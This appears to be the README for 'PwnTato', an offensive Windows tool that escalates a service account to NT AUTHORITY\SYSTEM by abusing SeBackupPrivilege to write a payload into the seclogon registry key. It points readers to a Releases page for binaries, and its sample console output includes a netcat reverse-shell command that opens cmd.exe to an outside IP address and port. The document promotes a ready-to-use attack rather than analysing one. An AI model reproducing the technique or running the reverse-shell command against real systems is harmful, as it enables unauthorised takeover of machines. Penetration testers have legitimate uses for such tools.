PwnTato is a local privilege escalation tool that facilitates the transition from Windows Service Accounts to NT AUTHORITY\SYSTEM. It leverages the SeBackupPrivilege token privilege to inject a payload into the seclogon registry key.
-
SeBackupPrivilege Injection: PwnTato injects the SeBackupPrivilege token privilege into the process to manipulate registry keys.
-
Registry Key Manipulation: The tool allows users to input a custom payload, which is then written to the
seclogonregistry key.
- Windows operating system
- PureBasic compiler (for compilation)
██ ██ ██
██ ██ ██ ██ ██ ██████
██ ██ ████ ██ ██ ██
██ ██ ██ ██ ██ ██
████ ██ ██ ██ ██
████ ██ ██ ██ ████
██▒▒████████████████▒▒██
██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
██▒▒██ ▒▒▒▒▒▒▒▒ ██▒▒██
██▒▒████▒▒▒▒▒▒▒▒████▒▒██
██▒▒▒▒▒▒▒▒████▒▒▒▒▒▒▒▒██
██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒████
████████████████████
v1.0
PwnTato by @duty1g
[+] SeBackupPrivilege token injected to the process
[!] Enter your seclogon payload: c:\windows\temp\nc.exe 192.168.1.2 1337 -e cmd.exe
Download the latest release from the Releases page. Choose the appropriate binary for your system.
This tool is intended for educational and testing purposes only. The author is not responsible for any misuse or damage caused by the use of this tool.
- duty1g
Feel free to contribute or report issues!